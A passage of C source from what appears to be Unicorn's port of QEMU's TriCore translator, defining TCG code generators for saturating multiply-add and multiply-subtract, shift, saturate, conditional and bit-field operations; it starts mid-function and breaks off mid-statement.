tcg_gen_muls2_tl(tcg_ctx, rh, rl, arg1, arg2); } else if (up_shift == 16) { tcg_gen_ext_i32_i64(tcg_ctx, temp_64, arg1); tcg_gen_ext_i32_i64(tcg_ctx, temp2_64, arg2); tcg_gen_mul_i64(tcg_ctx, temp_64, temp_64, temp2_64); tcg_gen_shri_i64(tcg_ctx, temp_64, temp_64, up_shift); tcg_gen_extr_i64_i32(tcg_ctx, rl, rh, temp_64); } else { tcg_gen_muls2_tl(tcg_ctx, rl, rh, arg1, arg2); } /* reset v bit */ tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_PSW_V, 0); } else { /* n is expected to be 1 */ tcg_gen_ext_i32_i64(tcg_ctx, temp_64, arg1); tcg_gen_ext_i32_i64(tcg_ctx, temp2_64, arg2); tcg_gen_mul_i64(tcg_ctx, temp_64, temp_64, temp2_64); if (up_shift == 0) { tcg_gen_shli_i64(tcg_ctx, temp_64, temp_64, 1); } else { tcg_gen_shri_i64(tcg_ctx, temp_64, temp_64, up_shift - 1); } tcg_gen_extr_i64_i32(tcg_ctx, rl, rh, temp_64); /* overflow only occurs if r1 = r2 = 0x8000 */ if (up_shift == 0) {/* result is 64 bit */ tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, tcg_ctx->cpu_PSW_V, rh, 0x80000000); } else { /* result is 32 bit */ tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, tcg_ctx->cpu_PSW_V, rl, 0x80000000); } tcg_gen_shli_tl(tcg_ctx, tcg_ctx->cpu_PSW_V, tcg_ctx->cpu_PSW_V, 31); /* calc sv overflow bit */ 
tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_SV, tcg_ctx->cpu_PSW_SV, tcg_ctx->cpu_PSW_V); } /* calc av overflow bit */ if (up_shift == 0) { tcg_gen_add_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, rh, rh); tcg_gen_xor_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, rh, tcg_ctx->cpu_PSW_AV); } else { tcg_gen_add_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, rl, rl); tcg_gen_xor_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, rl, tcg_ctx->cpu_PSW_AV); } /* calc sav overflow bit */ tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_SAV, tcg_ctx->cpu_PSW_SAV, tcg_ctx->cpu_PSW_AV); tcg_temp_free(tcg_ctx, temp); tcg_temp_free_i64(tcg_ctx, temp_64); tcg_temp_free_i64(tcg_ctx, temp2_64); } static void gen_mul_q_16(DisasContext *ctx, TCGv ret, TCGv arg1, TCGv arg2, uint32_t n) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_temp_new(tcg_ctx); if (n == 0) { tcg_gen_mul_tl(tcg_ctx, ret, arg1, arg2); } else { /* n is expected to be 1 */ tcg_gen_mul_tl(tcg_ctx, ret, arg1, arg2); tcg_gen_shli_tl(tcg_ctx, ret, ret, 1); /* catch special case r1 = r2 = 0x8000 */ tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, temp, ret, 0x80000000); tcg_gen_sub_tl(tcg_ctx, ret, ret, temp); } /* reset v bit */ tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_PSW_V, 0); /* calc av overflow bit */ tcg_gen_add_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, ret, ret); tcg_gen_xor_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, ret, tcg_ctx->cpu_PSW_AV); /* calc sav overflow bit */ tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_SAV, tcg_ctx->cpu_PSW_SAV, tcg_ctx->cpu_PSW_AV); tcg_temp_free(tcg_ctx, temp); } static void gen_mulr_q(DisasContext *ctx, TCGv ret, TCGv arg1, TCGv arg2, uint32_t n) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_temp_new(tcg_ctx); if (n == 0) { tcg_gen_mul_tl(tcg_ctx, ret, arg1, arg2); tcg_gen_addi_tl(tcg_ctx, ret, ret, 0x8000); } else { tcg_gen_mul_tl(tcg_ctx, ret, arg1, arg2); tcg_gen_shli_tl(tcg_ctx, ret, ret, 1); tcg_gen_addi_tl(tcg_ctx, ret, ret, 0x8000); /* catch special case r1 = r2 = 0x8000 */ tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, temp, ret, 0x80008000); tcg_gen_muli_tl(tcg_ctx, temp, temp, 0x8001); tcg_gen_sub_tl(tcg_ctx, ret, ret, temp); } /* reset v bit */ tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_PSW_V, 0); /* calc av overflow bit */ tcg_gen_add_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, ret, ret); tcg_gen_xor_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, ret, tcg_ctx->cpu_PSW_AV); /* calc sav overflow bit */ tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_SAV, tcg_ctx->cpu_PSW_SAV, tcg_ctx->cpu_PSW_AV); /* cut halfword off */ tcg_gen_andi_tl(tcg_ctx, ret, ret, 0xffff0000); tcg_temp_free(tcg_ctx, temp); } static inline void gen_madds_64(DisasContext *ctx, TCGv ret_low, TCGv ret_high, TCGv r1, TCGv r2_low, TCGv r2_high, TCGv r3) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i64 temp64 = tcg_temp_new_i64(tcg_ctx); tcg_gen_concat_i32_i64(tcg_ctx, temp64, r2_low, r2_high); gen_helper_madd64_ssov(tcg_ctx, temp64, tcg_ctx->cpu_env, r1, temp64, r3); tcg_gen_extr_i64_i32(tcg_ctx, ret_low, ret_high, temp64); tcg_temp_free_i64(tcg_ctx, temp64); } static inline void gen_maddsi_64(DisasContext *ctx, TCGv ret_low, TCGv ret_high, TCGv r1, TCGv r2_low, TCGv r2_high, int32_t con) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_const_i32(tcg_ctx, con); gen_madds_64(ctx, ret_low, ret_high, r1, r2_low, r2_high, temp); tcg_temp_free(tcg_ctx, temp); } static inline void gen_maddsu_64(DisasContext *ctx, TCGv ret_low, TCGv ret_high, TCGv r1, TCGv r2_low, TCGv r2_high, TCGv r3) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i64 temp64 = tcg_temp_new_i64(tcg_ctx); tcg_gen_concat_i32_i64(tcg_ctx, temp64, r2_low, r2_high); 
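    /* temp64 = {r2_high, r2_low}; the multiply-add with unsigned
       saturation itself is done by the madd64_suov helper. */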
gen_helper_madd64_suov(tcg_ctx, temp64, tcg_ctx->cpu_env, r1, temp64, r3); tcg_gen_extr_i64_i32(tcg_ctx, ret_low, ret_high, temp64); tcg_temp_free_i64(tcg_ctx, temp64); } static inline void gen_maddsui_64(DisasContext *ctx, TCGv ret_low, TCGv ret_high, TCGv r1, TCGv r2_low, TCGv r2_high, int32_t con) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_const_i32(tcg_ctx, con); gen_maddsu_64(ctx, ret_low, ret_high, r1, r2_low, r2_high, temp); tcg_temp_free(tcg_ctx, temp); } static inline void gen_msubsi_32(DisasContext *ctx, TCGv ret, TCGv r1, TCGv r2, int32_t con) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_const_i32(tcg_ctx, con); gen_helper_msub32_ssov(tcg_ctx, ret, tcg_ctx->cpu_env, r1, r2, temp); tcg_temp_free(tcg_ctx, temp); } static inline void gen_msubsui_32(DisasContext *ctx, TCGv ret, TCGv r1, TCGv r2, int32_t con) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_const_i32(tcg_ctx, con); gen_helper_msub32_suov(tcg_ctx, ret, tcg_ctx->cpu_env, r1, r2, temp); tcg_temp_free(tcg_ctx, temp); } static inline void gen_msubs_64(DisasContext *ctx, TCGv ret_low, TCGv ret_high, TCGv r1, TCGv r2_low, TCGv r2_high, TCGv r3) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i64 temp64 = tcg_temp_new_i64(tcg_ctx); tcg_gen_concat_i32_i64(tcg_ctx, temp64, r2_low, r2_high); gen_helper_msub64_ssov(tcg_ctx, temp64, tcg_ctx->cpu_env, r1, temp64, r3); tcg_gen_extr_i64_i32(tcg_ctx, ret_low, ret_high, temp64); tcg_temp_free_i64(tcg_ctx, temp64); } static inline void gen_msubsi_64(DisasContext *ctx, TCGv ret_low, TCGv ret_high, TCGv r1, TCGv r2_low, TCGv r2_high, int32_t con) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_const_i32(tcg_ctx, con); gen_msubs_64(ctx, ret_low, ret_high, r1, r2_low, r2_high, temp); tcg_temp_free(tcg_ctx, temp); } static inline void gen_msubsu_64(DisasContext *ctx, TCGv ret_low, TCGv ret_high, TCGv r1, TCGv r2_low, TCGv r2_high, TCGv r3) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i64 temp64 = tcg_temp_new_i64(tcg_ctx); tcg_gen_concat_i32_i64(tcg_ctx, temp64, r2_low, r2_high); gen_helper_msub64_suov(tcg_ctx, temp64, tcg_ctx->cpu_env, r1, temp64, r3); tcg_gen_extr_i64_i32(tcg_ctx, ret_low, ret_high, temp64); tcg_temp_free_i64(tcg_ctx, temp64); } static inline void gen_msubsui_64(DisasContext *ctx, TCGv ret_low, TCGv ret_high, TCGv r1, TCGv r2_low, TCGv r2_high, int32_t con) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_const_i32(tcg_ctx, con); gen_msubsu_64(ctx, ret_low, ret_high, r1, r2_low, r2_high, temp); tcg_temp_free(tcg_ctx, temp); } static void gen_saturate(DisasContext *ctx, TCGv ret, TCGv arg, int32_t up, int32_t low) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv sat_neg = tcg_const_i32(tcg_ctx, low); TCGv temp = tcg_const_i32(tcg_ctx, up); /* sat_neg = (arg < low ) ? low : arg; */ tcg_gen_movcond_tl(tcg_ctx, TCG_COND_LT, sat_neg, arg, sat_neg, sat_neg, arg); /* ret = (sat_neg > up ) ? up : sat_neg; */ tcg_gen_movcond_tl(tcg_ctx, TCG_COND_GT, ret, sat_neg, temp, temp, sat_neg); tcg_temp_free(tcg_ctx, sat_neg); tcg_temp_free(tcg_ctx, temp); } static void gen_saturate_u(DisasContext *ctx, TCGv ret, TCGv arg, int32_t up) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_const_i32(tcg_ctx, up); /* sat_neg = (arg > up ) ? 
up : arg; */ tcg_gen_movcond_tl(tcg_ctx, TCG_COND_GTU, ret, arg, temp, temp, arg); tcg_temp_free(tcg_ctx, temp); } static void gen_shi(DisasContext *ctx, TCGv ret, TCGv r1, int32_t shift_count) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; if (shift_count == -32) { tcg_gen_movi_tl(tcg_ctx, ret, 0); } else if (shift_count >= 0) { tcg_gen_shli_tl(tcg_ctx, ret, r1, shift_count); } else { tcg_gen_shri_tl(tcg_ctx, ret, r1, -shift_count); } } static void gen_sh_hi(DisasContext *ctx, TCGv ret, TCGv r1, int32_t shiftcount) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp_low, temp_high; if (shiftcount == -16) { tcg_gen_movi_tl(tcg_ctx, ret, 0); } else { temp_high = tcg_temp_new(tcg_ctx); temp_low = tcg_temp_new(tcg_ctx); tcg_gen_andi_tl(tcg_ctx, temp_low, r1, 0xffff); tcg_gen_andi_tl(tcg_ctx, temp_high, r1, 0xffff0000); gen_shi(ctx, temp_low, temp_low, shiftcount); gen_shi(ctx, ret, temp_high, shiftcount); tcg_gen_deposit_tl(tcg_ctx, ret, ret, temp_low, 0, 16); tcg_temp_free(tcg_ctx, temp_low); tcg_temp_free(tcg_ctx, temp_high); } } static void gen_shaci(DisasContext *ctx, TCGv ret, TCGv r1, int32_t shift_count) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint32_t msk, msk_start; TCGv temp = tcg_temp_new(tcg_ctx); TCGv temp2 = tcg_temp_new(tcg_ctx); TCGv t_0 = tcg_const_i32(tcg_ctx, 0); if (shift_count == 0) { /* Clear PSW.C and PSW.V */ tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_PSW_C, 0); tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_PSW_V, tcg_ctx->cpu_PSW_C); tcg_gen_mov_tl(tcg_ctx, ret, r1); } else if (shift_count == -32) { /* set PSW.C */ tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_PSW_C, r1); /* fill ret completely with sign bit */ tcg_gen_sari_tl(tcg_ctx, ret, r1, 31); /* clear PSW.V */ tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_PSW_V, 0); } else if (shift_count > 0) { TCGv t_max = tcg_const_i32(tcg_ctx, 0x7FFFFFFF >> shift_count); TCGv t_min = tcg_const_i32(tcg_ctx, ((int32_t) -0x80000000) >> shift_count); /* calc carry */ msk_start = 32 - shift_count; msk = ((1 << shift_count) - 1) << msk_start; tcg_gen_andi_tl(tcg_ctx, tcg_ctx->cpu_PSW_C, r1, msk); /* calc v/sv bits */ tcg_gen_setcond_tl(tcg_ctx, TCG_COND_GT, temp, r1, t_max); tcg_gen_setcond_tl(tcg_ctx, TCG_COND_LT, temp2, r1, t_min); tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_V, temp, temp2); tcg_gen_shli_tl(tcg_ctx, tcg_ctx->cpu_PSW_V, tcg_ctx->cpu_PSW_V, 31); /* calc sv */ tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_SV, tcg_ctx->cpu_PSW_V, tcg_ctx->cpu_PSW_SV); /* do shift */ tcg_gen_shli_tl(tcg_ctx, ret, r1, shift_count); tcg_temp_free(tcg_ctx, t_max); tcg_temp_free(tcg_ctx, t_min); } else { /* clear PSW.V */ tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_PSW_V, 0); /* calc carry */ msk = (1 << -shift_count) - 1; tcg_gen_andi_tl(tcg_ctx, tcg_ctx->cpu_PSW_C, r1, msk); /* do shift */ tcg_gen_sari_tl(tcg_ctx, ret, r1, -shift_count); } /* calc av overflow bit */ tcg_gen_add_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, ret, ret); tcg_gen_xor_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, ret, tcg_ctx->cpu_PSW_AV); /* calc sav overflow bit */ tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_SAV, tcg_ctx->cpu_PSW_SAV, tcg_ctx->cpu_PSW_AV); tcg_temp_free(tcg_ctx, temp); tcg_temp_free(tcg_ctx, temp2); tcg_temp_free(tcg_ctx, t_0); } static void gen_shas(DisasContext *ctx, TCGv ret, TCGv r1, TCGv r2) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; gen_helper_sha_ssov(tcg_ctx, ret, tcg_ctx->cpu_env, r1, r2); } static void gen_shasi(DisasContext *ctx, TCGv ret, TCGv r1, int32_t con) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_const_i32(tcg_ctx, con); gen_shas(ctx, ret, r1, temp); tcg_temp_free(tcg_ctx, temp); } 
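/* Per-halfword arithmetic shift: each 16-bit half of r1 is shifted
   independently; a negative shift count shifts right. */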
static void gen_sha_hi(DisasContext *ctx, TCGv ret, TCGv r1, int32_t shift_count) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv low, high; if (shift_count == 0) { tcg_gen_mov_tl(tcg_ctx, ret, r1); } else if (shift_count > 0) { low = tcg_temp_new(tcg_ctx); high = tcg_temp_new(tcg_ctx); tcg_gen_andi_tl(tcg_ctx, high, r1, 0xffff0000); tcg_gen_shli_tl(tcg_ctx, low, r1, shift_count); tcg_gen_shli_tl(tcg_ctx, ret, high, shift_count); tcg_gen_deposit_tl(tcg_ctx, ret, ret, low, 0, 16); tcg_temp_free(tcg_ctx, low); tcg_temp_free(tcg_ctx, high); } else { low = tcg_temp_new(tcg_ctx); high = tcg_temp_new(tcg_ctx); tcg_gen_ext16s_tl(tcg_ctx, low, r1); tcg_gen_sari_tl(tcg_ctx, low, low, -shift_count); tcg_gen_sari_tl(tcg_ctx, ret, r1, -shift_count); tcg_gen_deposit_tl(tcg_ctx, ret, ret, low, 0, 16); tcg_temp_free(tcg_ctx, low); tcg_temp_free(tcg_ctx, high); } } /* ret = {ret[30:0], (r1 cond r2)}; */ static void gen_sh_cond(DisasContext *ctx, int cond, TCGv ret, TCGv r1, TCGv r2) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_temp_new(tcg_ctx); TCGv temp2 = tcg_temp_new(tcg_ctx); tcg_gen_shli_tl(tcg_ctx, temp, ret, 1); tcg_gen_setcond_tl(tcg_ctx, cond, temp2, r1, r2); tcg_gen_or_tl(tcg_ctx, ret, temp, temp2); tcg_temp_free(tcg_ctx, temp); tcg_temp_free(tcg_ctx, temp2); } static void gen_sh_condi(DisasContext *ctx, int cond, TCGv ret, TCGv r1, int32_t con) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_const_i32(tcg_ctx, con); gen_sh_cond(ctx, cond, ret, r1, temp); tcg_temp_free(tcg_ctx, temp); } static inline void gen_adds(DisasContext *ctx, TCGv ret, TCGv r1, TCGv r2) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; gen_helper_add_ssov(tcg_ctx, ret, tcg_ctx->cpu_env, r1, r2); } static inline void gen_addsi(DisasContext *ctx, TCGv ret, TCGv r1, int32_t con) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_const_i32(tcg_ctx, con); gen_helper_add_ssov(tcg_ctx, ret, tcg_ctx->cpu_env, r1, temp); tcg_temp_free(tcg_ctx, temp); } static inline void gen_addsui(DisasContext *ctx, TCGv ret, TCGv r1, int32_t con) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_const_i32(tcg_ctx, con); gen_helper_add_suov(tcg_ctx, ret, tcg_ctx->cpu_env, r1, temp); tcg_temp_free(tcg_ctx, temp); } static inline void gen_subs(DisasContext *ctx, TCGv ret, TCGv r1, TCGv r2) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; gen_helper_sub_ssov(tcg_ctx, ret, tcg_ctx->cpu_env, r1, r2); } static inline void gen_subsu(DisasContext *ctx, TCGv ret, TCGv r1, TCGv r2) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; gen_helper_sub_suov(tcg_ctx, ret, tcg_ctx->cpu_env, r1, r2); } static inline void gen_bit_2op(DisasContext *ctx, TCGv ret, TCGv r1, TCGv r2, int pos1, int pos2, void(*op1)(TCGContext*, TCGv, TCGv, TCGv), void(*op2)(TCGContext*, TCGv, TCGv, TCGv)) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp1, temp2; temp1 = tcg_temp_new(tcg_ctx); temp2 = tcg_temp_new(tcg_ctx); tcg_gen_shri_tl(tcg_ctx, temp2, r2, pos2); tcg_gen_shri_tl(tcg_ctx, temp1, r1, pos1); (*op1)(tcg_ctx, temp1, temp1, temp2); (*op2)(tcg_ctx, temp1 , ret, temp1); tcg_gen_deposit_tl(tcg_ctx, ret, ret, temp1, 0, 1); tcg_temp_free(tcg_ctx, temp1); tcg_temp_free(tcg_ctx, temp2); } /* ret = r1[pos1] op1 r2[pos2]; */ static inline void gen_bit_1op(DisasContext *ctx, TCGv ret, TCGv r1, TCGv r2, int pos1, int pos2, void(*op1)(TCGContext*, TCGv, TCGv, TCGv)) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp1, temp2; temp1 = tcg_temp_new(tcg_ctx); temp2 = tcg_temp_new(tcg_ctx); tcg_gen_shri_tl(tcg_ctx, temp2, r2, pos2); tcg_gen_shri_tl(tcg_ctx, temp1, r1, 
pos1);
    (*op1)(tcg_ctx, ret, temp1, temp2);
    tcg_gen_andi_tl(tcg_ctx, ret, ret, 0x1);
    tcg_temp_free(tcg_ctx, temp1);
    tcg_temp_free(tcg_ctx, temp2);
}

static inline void gen_accumulating_cond(DisasContext *ctx, int cond,
                                         TCGv ret, TCGv r1, TCGv r2,
                                         void(*op)(TCGContext*, TCGv, TCGv, TCGv))
{
    TCGContext *tcg_ctx = ctx->uc->tcg_ctx;
    TCGv temp = tcg_temp_new(tcg_ctx);
    TCGv temp2 = tcg_temp_new(tcg_ctx);
    /* temp = (arg1 cond arg2) */
    tcg_gen_setcond_tl(tcg_ctx, cond, temp, r1, r2);
    /* temp2 = ret[0] */
    tcg_gen_andi_tl(tcg_ctx, temp2, ret, 0x1);
    /* temp = temp insn temp2 */
    (*op)(tcg_ctx, temp, temp, temp2);
    /* ret = {ret[31:1], temp} */
    tcg_gen_deposit_tl(tcg_ctx, ret, ret, temp, 0, 1);

    tcg_temp_free(tcg_ctx, temp);
    tcg_temp_free(tcg_ctx, temp2);
}

static inline void
gen_accumulating_condi(DisasContext *ctx, int cond, TCGv ret, TCGv r1,
                       int32_t con, void(*op)(TCGContext*, TCGv, TCGv, TCGv))
{
    TCGContext *tcg_ctx = ctx->uc->tcg_ctx;
    TCGv temp = tcg_const_i32(tcg_ctx, con);
    gen_accumulating_cond(ctx, cond, ret, r1, temp, op);
    tcg_temp_free(tcg_ctx, temp);
}

/* ret = (r1 cond r2) ? 0xFFFFFFFF : 0x00000000; */
static inline void gen_cond_w(DisasContext *ctx, TCGCond cond, TCGv ret,
                              TCGv r1, TCGv r2)
{
    TCGContext *tcg_ctx = ctx->uc->tcg_ctx;
    tcg_gen_setcond_tl(tcg_ctx, cond, ret, r1, r2);
    tcg_gen_neg_tl(tcg_ctx, ret, ret);
}

static inline void gen_eqany_bi(DisasContext *ctx, TCGv ret, TCGv r1,
                                int32_t con)
{
    TCGContext *tcg_ctx = ctx->uc->tcg_ctx;
    TCGv b0 = tcg_temp_new(tcg_ctx);
    TCGv b1 = tcg_temp_new(tcg_ctx);
    TCGv b2 = tcg_temp_new(tcg_ctx);
    TCGv b3 = tcg_temp_new(tcg_ctx);

    /* byte 0 */
    tcg_gen_andi_tl(tcg_ctx, b0, r1, 0xff);
    tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, b0, b0, con & 0xff);
    /* byte 1 */
    tcg_gen_andi_tl(tcg_ctx, b1, r1, 0xff00);
    tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, b1, b1, con & 0xff00);
    /* byte 2 */
    tcg_gen_andi_tl(tcg_ctx, b2, r1, 0xff0000);
    tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, b2, b2, con & 0xff0000);
    /* byte 3 */
    tcg_gen_andi_tl(tcg_ctx, b3, r1, 0xff000000);
    tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, b3, b3, con & 0xff000000);

    /* combine them */
    tcg_gen_or_tl(tcg_ctx, ret, b0, b1);
    tcg_gen_or_tl(tcg_ctx, ret, ret, b2);
    tcg_gen_or_tl(tcg_ctx, ret, ret, b3);

    tcg_temp_free(tcg_ctx, b0);
    tcg_temp_free(tcg_ctx, b1);
    tcg_temp_free(tcg_ctx, b2);
    tcg_temp_free(tcg_ctx, b3);
}

static inline void gen_eqany_hi(DisasContext *ctx, TCGv ret, TCGv r1,
                                int32_t con)
{
    TCGContext *tcg_ctx = ctx->uc->tcg_ctx;
    TCGv h0 = tcg_temp_new(tcg_ctx);
    TCGv h1 = tcg_temp_new(tcg_ctx);

    /* halfword 0 */
    tcg_gen_andi_tl(tcg_ctx, h0, r1, 0xffff);
    tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, h0, h0, con & 0xffff);
    /* halfword 1 */
    tcg_gen_andi_tl(tcg_ctx, h1, r1, 0xffff0000);
    tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, h1, h1, con & 0xffff0000);

    /* combine them */
    tcg_gen_or_tl(tcg_ctx, ret, h0, h1);

    tcg_temp_free(tcg_ctx, h0);
    tcg_temp_free(tcg_ctx, h1);
}

/* mask = ((1 << width) - 1) << pos;
   ret = (r1 & ~mask) | ((r2 << pos) & mask); */
static inline void gen_insert(DisasContext *ctx, TCGv ret, TCGv r1, TCGv r2,
                              TCGv width, TCGv pos)
{
    TCGContext *tcg_ctx = ctx->uc->tcg_ctx;
    TCGv mask = tcg_temp_new(tcg_ctx);
    TCGv temp = tcg_temp_new(tcg_ctx);
    TCGv temp2 = tcg_temp_new(tcg_ctx);

    tcg_gen_movi_tl(tcg_ctx, mask, 1);
    tcg_gen_shl_tl(tcg_ctx, mask, mask, width);
    tcg_gen_subi_tl(tcg_ctx, mask, mask, 1);
    tcg_gen_shl_tl(tcg_ctx, mask, mask, pos);

    tcg_gen_shl_tl(tcg_ctx, temp, r2, pos);
    tcg_gen_and_tl(tcg_ctx, temp, temp, mask);
    tcg_gen_andc_tl(tcg_ctx, temp2, r1, mask);
    tcg_gen_or_tl(tcg_ctx, ret, temp, temp2);
tcg_temp_free(tcg_ctx, mask); tcg_temp_free(tcg_ctx, temp); tcg_temp_free(tcg_ctx, temp2); } static inline void gen_bsplit(DisasContext *ctx, TCGv rl, TCGv rh, TCGv r1) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i64 temp = tcg_temp_new_i64(tcg_ctx); gen_helper_bsplit(tcg_ctx, temp, r1); tcg_gen_extr_i64_i32(tcg_ctx, rl, rh, temp); tcg_temp_free_i64(tcg_ctx, temp); } static inline void gen_unpack(DisasContext *ctx, TCGv rl, TCGv rh, TCGv r1) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i64 temp = tcg_temp_new_i64(tcg_ctx); gen_helper_unpack(tcg_ctx, temp, r1); tcg_gen_extr_i64_i32(tcg_ctx, rl, rh, temp); tcg_temp_free_i64(tcg_ctx, temp); } static inline void gen_dvinit_b(DisasContext *ctx, TCGv rl, TCGv rh, TCGv r1, TCGv r2) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i64 ret = tcg_temp_new_i64(tcg_ctx); if (!has_feature(ctx, TRICORE_FEATURE_131)) { gen_helper_dvinit_b_13(tcg_ctx, ret, tcg_ctx->cpu_env, r1, r2); } else { gen_helper_dvinit_b_131(tcg_ctx, ret, tcg_ctx->cpu_env, r1, r2); } tcg_gen_extr_i64_i32(tcg_ctx, rl, rh, ret); tcg_temp_free_i64(tcg_ctx, ret); } static inline void gen_dvinit_h(DisasContext *ctx, TCGv rl, TCGv rh, TCGv r1, TCGv r2) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i64 ret = tcg_temp_new_i64(tcg_ctx); if (!has_feature(ctx, TRICORE_FEATURE_131)) { gen_helper_dvinit_h_13(tcg_ctx, ret, tcg_ctx->cpu_env, r1, r2); } else { gen_helper_dvinit_h_131(tcg_ctx, ret, tcg_ctx->cpu_env, r1, r2); } tcg_gen_extr_i64_i32(tcg_ctx, rl, rh, ret); tcg_temp_free_i64(tcg_ctx, ret); } static void gen_calc_usb_mul_h(DisasContext *ctx, TCGv arg_low, TCGv arg_high) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_temp_new(tcg_ctx); /* calc AV bit */ tcg_gen_add_tl(tcg_ctx, temp, arg_low, arg_low); tcg_gen_xor_tl(tcg_ctx, temp, temp, arg_low); tcg_gen_add_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, arg_high, arg_high); tcg_gen_xor_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, tcg_ctx->cpu_PSW_AV, arg_high); tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, tcg_ctx->cpu_PSW_AV, temp); /* calc SAV bit */ tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_SAV, tcg_ctx->cpu_PSW_SAV, tcg_ctx->cpu_PSW_AV); tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_PSW_V, 0); tcg_temp_free(tcg_ctx, temp); } static void gen_calc_usb_mulr_h(DisasContext *ctx, TCGv arg) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_temp_new(tcg_ctx); /* calc AV bit */ tcg_gen_add_tl(tcg_ctx, temp, arg, arg); tcg_gen_xor_tl(tcg_ctx, temp, temp, arg); tcg_gen_shli_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, temp, 16); tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, tcg_ctx->cpu_PSW_AV, temp); /* calc SAV bit */ tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_SAV, tcg_ctx->cpu_PSW_SAV, tcg_ctx->cpu_PSW_AV); /* clear V bit */ tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_PSW_V, 0); tcg_temp_free(tcg_ctx, temp); } /* helpers for generating program flow micro-ops */ static inline void gen_save_pc(DisasContext *ctx, target_ulong pc) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_PC, pc); } static inline bool use_goto_tb(DisasContext *ctx, target_ulong dest) { if (unlikely(ctx->base.singlestep_enabled)) { return false; } return (ctx->base.tb->pc & TARGET_PAGE_MASK) == (dest & TARGET_PAGE_MASK); } static void gen_goto_tb(DisasContext *ctx, int n, target_ulong dest) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; // if (translator_use_goto_tb(&ctx->base, dest)) { if 